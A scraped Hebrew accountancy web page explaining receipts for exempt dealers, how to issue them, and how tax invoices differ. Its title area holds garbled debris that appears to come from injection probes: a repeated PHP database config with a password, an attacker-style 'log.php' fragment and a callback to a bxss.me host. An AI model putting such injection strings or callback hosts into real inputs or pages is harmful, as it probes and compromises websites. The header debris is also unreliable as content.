$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1iHl8CheO"; ?> $db_host = "1"; $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1<tMjBvl<"; ?>acker-9573/log.php?"; ?>{acx}}%>"; ?>"; ?>ass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>'hitylezkgfiwoe392a.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>  רואה חשבון ועוד - הנפקת קבלה


רואה חשבון ועוד!

הבית הפיננסי שלך

 רואה חשבון ועוד
חוות דעת מקצועית בענייני ראיית חשבון:
שם מלא
מספר טלפון
פנייה לרואה חשבון >>

מהי קבלה?


דרגו אותנו:
| דירוגך () בוצע בהצלחה
 () דירוגים | דירוג ממוצע ()
stars - based on reviews

Hebrew

כל תשלום או תקבול הניתן לבעל עסק מחייב את בעל העסק להנפיק מיד קבלה לנותן התשלום ללא קשר לאופן קבלת התשלום או לתאריך פירעונו.

הקבלה היא מסמך רשמי המשמש כאסמכתא וכאישור על קבלת תשלום עבור מוצר או שירות כלשהו והיא ניתנת לנותן התשלום, על ידי עוסק פטור שאיננו מחויב בתשלום מס ערך מוסף.

עוסק פטור מוגדר בחוק כעוסק שהיקף הכנסותיו מעסקאות בשנה איננו עולה על סכום המתעדכן מעת לעת ביחס ישיר לעליית מדד המחירים לצרכן, ובינואר 2009 עמד על 70,650 שקלים חדשים.

בשנת 2002 בוטלו בחוק מס ערך מוסף הגדרות "עוסק זעיר" ו"עוסק זעיר פטור" ובמקומן הונהגה ההגדרה "עוסק פטור" במטרה להקל ולהגמיש מעט את ההליכים הבירוקרטים עבור בעלי עסק מתחילים המנסים לסלול את דרכם כעצמאיים בשוק עבודה וגם לצמצם מעט את מספרם של העוסקים המורשים הקיימים בשוק.

קיראו את המדריך לפתיחת עסק

הקבלה חייבת להינתן לאחר קבלת שיק, המחאה, תשלום בכרטיס אשראי, העברה בנקאית, ברטר, מזומן, שיק ביטחון, שטר חוב או תשלום בכל צורה אחרת. בקבלה יש לציין את התאריך, את אופן התקבול ואם ניתן שיק, יש לציין את פרטי השיק ולבסוף לחתום.

כיצד להוציא קבלה?

פנקס קבלות פשוט, ניתן לרכוש כמעט בכל חנות למכשירי כתיבה ובעת הצורך ניתן אף להפיק קבלות מעוצבות ומיוחדות בבתי דפוס שונים.

אם קניתם פנקס קבלות פשוט, יש למספר את הקבלות ולהטביע עליהן חותמת הכוללת את הפרטים הבאים: שם בעל העסק, מספר עוסק פטור שהוא לרוב מספר תעודת הזהות, טלפון וכתובת העסק.

בנוסף לכך, יש לציין בקבלה מהו אמצעי התשלום, עבור מה ניתן התשלום ובמידת הצורך, גם את סכום המס שנוכה במקור. אם אין ברשותכם חותמת, תוכלו למלא את הפרטים הרלוונטיים גם בכתב יד.

כמו כן, ניתן היום לרכוש תוכנה מיוחדת להנפקת קבלות אותן אפשר לשלוח גם באמצעות הדואר האלקטרוני.

את המקור של הקבלה עליו מצוינת המילה "מקור" יש להעביר ללקוח לאחר החתימה ואת העתק יש לשמור ולתייק. במידת הצורך, ניתן להפיק העתקים נוספים.

קיראו על: דיווח מיסים מקוון

בעל עסק שלא הנפיק קבלה לאחר קבלת תשלום, עלול להסתכן בפסילת ספרי החשבונות שברשותו על יד רשויות המס ובחשד כי הוא מנסה להעלים מס.

חשבונית מס

חשבונית מס היא דרישה לתשלום, גם היא מונפקת לאחר סיום העבודה או לאחר אספקה של המוצר אך בניגוד לקבלה החשבונית ניתנת על ידי עוסק מורשה המחויב בתשלום מס ערך מוסף.

לפי הוראות החוק, צריכה חשבונית המס לכלול, ממש בדומה לקבלה, את תאריך ביצוע העסקה, מספר חשבונית, שם העסק, מספר עוסק מורשה, כתובת וטלפון.

בנוסף לכך, בחשבונית יש לציין את פרטי הלקוח, פרטי העסקה ופרטי התשלום המלאים. החשבונית בדומה לקבלה כוללת מקור והעתקים נוספים, כאשר סכום התשלום בחשבונית כולל נוסף לגובה העסקה גם תוספת מס ערך מוסף שאיננה קיימת בקבלה.

לחצו וקיראו מהי הוצאה עסקית

את החשבונית יש להפיק בסמוך ככל שניתן לתאריך השלמת העסקה גם אם התשלום לא ניתן במעמד בו ניתן השירות או נמסר המוצר.

חשבונית המס היא הבסיס לרישום מסודר של הכנסות העסק וגם הבסיס לכתיבת דוחות נוספים של העסק, כדוגמת הדו"ח למס ערך מוסף ודו"ח מקדמות מס.

לקריאה נוספת: הנהלת חשבונות בעסק


תאריך: 07/10/2014 11:19
 
close